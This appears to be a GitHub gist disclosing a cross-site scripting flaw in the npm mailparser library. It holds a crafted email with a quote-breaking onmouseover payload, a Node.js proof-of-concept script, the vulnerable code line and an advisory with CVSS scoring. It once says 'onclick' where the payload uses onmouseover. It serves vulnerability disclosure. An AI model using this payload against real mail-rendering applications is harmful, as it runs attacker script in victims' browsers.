Skip to content

Instantly share code, notes, and snippets.

@hayageek

hayageek/exploit-input.eml Secret

Created January 28, 2026 07:04
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save hayageek/7fcb225e3b1ea9a341d560403fbb585a to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save hayageek/7fcb225e3b1ea9a341d560403fbb585a to your computer and use it in GitHub Desktop.
Download ZIP
Cross-Site Scripting (XSS) in mailparser
Raw
exploit-input.eml
From: attacker@evil.com
To: victim@example.com
Subject: Working XSS Exploit
Date: Wed, 28 Jan 2026 10:00:00 +0000
Content-Type: text/plain; charset=utf-8
http://google.com?"onmouseover="alert('XSS')"
Raw
exploit-working-test.js
const fs = require('fs');
const {simpleParser} = require('mailparser');
let input = fs.createReadStream(__dirname + '/exploit-input.eml');
simpleParser(input, {
skipHtmlToText: true,
skipImageLinks: true,
skipTextToHtml: false,
skipTextLinks: false,
keepDeliveryStatus: true,
keepCidLinks: true
})
.then(mail => {
const vulnerableHtml = mail.textAsHtml || mail.html || '';
//Open the html file in chrome/browser. alert is shown on mouseover
fs.writeFileSync(__dirname + '/poc_output.html', vulnerableHtml);
})
.catch(err => {
console.log('Error:', err);
});
Raw
mailparser.md

Security Advisory: XSS Vulnerability in mailparser

Summary

Severity: 🔴 HIGH
CVSS 3.1: 7.5 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
CWE: CWE-79 (Cross-site Scripting)

A Cross-Site Scripting (XSS) vulnerability in mailparser allows attackers to inject arbitrary JavaScript through malicious email content when URLs containing quotes are processed.

Affected Versions

  • Package: mailparser (npm)
  • Affected: All versions ≤ 3.9.1
  • Status: ⚠️ Not yet fixed

Vulnerability Details

Location

File: https://github.com/nodemailer/mailparser/blob/master/lib/mail-parser.js#L1132

Line: 1132
Function: textToHtml()

Vulnerable Code

result.push(`<a href="${link.url}">${link.text}</a>`);

Root Cause

The code inserts link.url and link.text (extracted from email by linkify-it) directly into HTML without encoding. When URLs contain quotes in query parameters, fragments, or paths, these quotes break out of the href attribute, enabling attribute injection and XSS.

Attack Vector

Exploit Example

Malicious Email:

From: attacker@evil.com
To: victim@example.com
Subject: Check this out
Content-Type: text/plain

Visit: http://google.com?"onmouseover="alert('XSS')"

Generated HTML:

<a href="http://google.com?"onmouseover="alert('XSS')">http://google.com?"onmouseover="alert('XSS')</a>

The quote (") breaks out of href, injecting the onclick attribute.

Proof of Concept

Test Script

const fs = require('fs');
const {simpleParser} = require('mailparser');

let input = fs.createReadStream(__dirname + '/exploit-input.eml');

simpleParser(input, {
    skipHtmlToText: true,
    skipImageLinks: true,
    skipTextToHtml: false,
    skipTextLinks: false,
    keepDeliveryStatus: true,
    keepCidLinks: true
})
    .then(mail => {
        const vulnerableHtml = mail.textAsHtml || mail.html || '';
        //Open the html file in chrome/browser. alert is shown on mouseover
        fs.writeFileSync(__dirname + '/poc_output.html', vulnerableHtml);
    })
    .catch(err => {
        console.log('Error:', err);
    });

References

Credits

https://github.com/hayageek/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment